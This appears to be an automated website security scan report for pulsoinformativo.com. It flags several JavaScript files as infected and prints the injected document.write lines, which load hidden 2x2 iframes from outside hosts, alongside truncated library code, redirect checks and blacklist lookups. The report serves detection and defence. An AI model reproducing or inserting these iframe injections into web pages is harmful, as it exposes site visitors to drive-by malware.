Scanned pages/files
Request | Server response | Status |
http://pulsoinformativo.com/ | 200 OK Content-Length: 52043 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?i=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?i=593124> | ||
http://pulsoinformativo.com/includes/functions/xajax/xajax_js/xajax_core.js | 200 OK Content-Length: 39824 Content-Type: application/javascript | clean |
http://pulsoinformativo.com/includes/js/iepngfix_tilebg.js | 200 OK Content-Length: 4437 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var IEPNGFix = window.IEPNGFix || {}; IEPNGFix.tileBG = function(elm, pngSrc, ready) { var data = this.data[ }; }; IEPNGFix.update = function() { for (var i in IEPNGFix.data) { var t = IEPNGFix.data[i].tiles; if (t && t.elm && t.src) { IEPNGFix.tileBG(t.elm, t.src); } } }; IEPNGFix.update.timer = 0; if (window.attachEvent && !window.opera) { window.attachEvent('onresize', function() { clearTimeout(IEPNGFix.update.timer); IEPNGFix.update.timer = setTimeout(IEPNGFix.update, 100); }); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> | ||
http://pulsoinformativo.com/includes/js/general.js | 200 OK Content-Length: 1913 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length, if (restore) selObj.selectedIndex=0; } function SubmitEnter(myfield,e) { var keycode; if (window.event) keycode = window.event.keyCode; else if (e) keycode = e.which; else return true; if (keycode == 13) { myfield.form.submit(); return false; } else return true; } function MM_openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> | ||
http://pulsoinformativo.com/includes/js/swfobject.js | 200 OK Content-Length: 10095 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var swfobject=function(){var b="undefined",Q="object",n="Shockwave Flash",p="ShockwaveFlash.ShockwaveFlash",P="application/x Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> | ||
http://pulsoinformativo.com/includes/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57590 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+&g Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> | ||
http://pulsoinformativo.com/includes/js/ddaccordion.js | 200 OK Content-Length: 11779 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var ddaccordion={ contentclassname:{}, expandone:function(headerclass, selected){ this.toggleone(headercl $(window).bind('unload', function(){ $('.'+config["headerclass"]).unbind() var expandedindices=[] $('.'+config["contentclass"]+":visible").each(function(index){ expandedindices.push($(this).attr('contentindex')) }) if (config.persiststate==true){ expandedindices=(expandedindices.length==0)? '-1c' : expandedindices ddaccordion.setCookie(config.headerclass, expandedindices) } }) }) } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> | ||
http://pulsoinformativo.com/includes/js/sexylightbox.js | 200 OK Content-Length: 22921 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var SexyLightBox = new Class({ getOptions: { name : 'SLB', zIndex : 65555, color parseQuery: function (query) { if( !query ) return {}; var params = {}; var pairs = query.split(/[;&]/); for ( var i = 0; i < pairs.length; i++ ) { var pair = pairs[i].split('='); if ( !pair || pair.length != 2 ) continue; params[unescape(pair[0])] = unescape(pair[1]).replace(/\+/g, ' '); } return params; } }); SexyLightBox.implement(new Events, new Options); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> | ||
http://pulsoinformativo.com/includes/js/multibox.js | 200 OK Content-Length: 23342 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var MultiBox = new Class({ getOptions: function(){ return { initialWidth: 250, initialHeight: this.str += '<param name="autostart" value="true" />'; this.str += '<embed src="'+this.contentObj.url+'" controls="ImageWindow" autostart="true" width="'+this.contentObj.width+'" height="'+this.contentObj.height+'"></embed>'; this.str += '<object/>'; } return obj; } }); MultiBox.implement(new Options); MultiBox.implement(new Events); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> | ||
http://pulsoinformativo.com/includes/js/overlay.js | 200 OK Content-Length: 2898 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); var Overlay = new Class({ getOptions: function(){ return { colour: '#B7E3F9', opacity: 0.8, this.container.setStyles({ top: myCoords.top+'px', height: myCoords.height+'px', left: myCoords.left+'px', width: myCoords.width+'px' }); } }, show: function(){ this.fade.start('opacity',0,this.options.opacity); }, hide: function(){ this.fade.start('opacity',this.options.opacity,0); } }); Overlay.implement(new Options); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> | ||
http://pulsoinformativo.com/includes/js/webticker_lib.js | 200 OK Content-Length: 2499 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124></iframe>'); TICKER_CONTENT = document.getElementById("TICKER").innerHTML; TICKER_RIGHTTOLEFT = false; TICKER_SPEED = 1; if(!TICKER_RIGHTTOLEFT && document.getElementById("TICKER").scrollLeft >= document.getElementById("TICKER").scrollWidth - document.getElementById("TICKER").offsetWidth) document.getElementById("TICKER").scrollLeft = 0; window.setTimeout("TICKER_tick()", 30); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> | ||
http://www.tutiempo.net/TTapi/cc/SpW4g9HmErmlRZ | 200 OK Content-Length: 1126 Content-Type: application/x-javascript | clean |
http://pulsoinformativo.com/includes/js/countdown.js | 200 OK Content-Length: 2838 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=593124> Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?j=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?j=593124> | ||
http://pulsoinformativo.com/index.php | 200 OK Content-Length: 52043 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?i=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?i=593124> | ||
http://pulsoinformativo.com/pulso.php?mostrar=1 | 200 OK Content-Length: 39073 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://escorts-bucharest.net/mhed.html?i=593124 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://escorts-bucharest.net/mhed.html?i=593124> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pulsoinformativo.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 27 Jan 2015 04:10:31 GMT
Pragma: no-cache
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8;
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9e9712fd985a1d51001a20343e2a6f80; path=/
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: pulsoinformativo.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 27 Jan 2015 04:10:31 GMT
Pragma: no-cache
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8;
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9e9712fd985a1d51001a20343e2a6f80; path=/
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: pulsoinformativo.com
Referer: http://www.google.com/search?q=pulsoinformativo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pulsoinformativo.com
Referer: http://www.google.com/search?q=pulsoinformativo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pulsoinformativo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pulsoinformativo.com/
Result: pulsoinformativo.com is not infected or malware details are not published yet.
Result: pulsoinformativo.com is not infected or malware details are not published yet.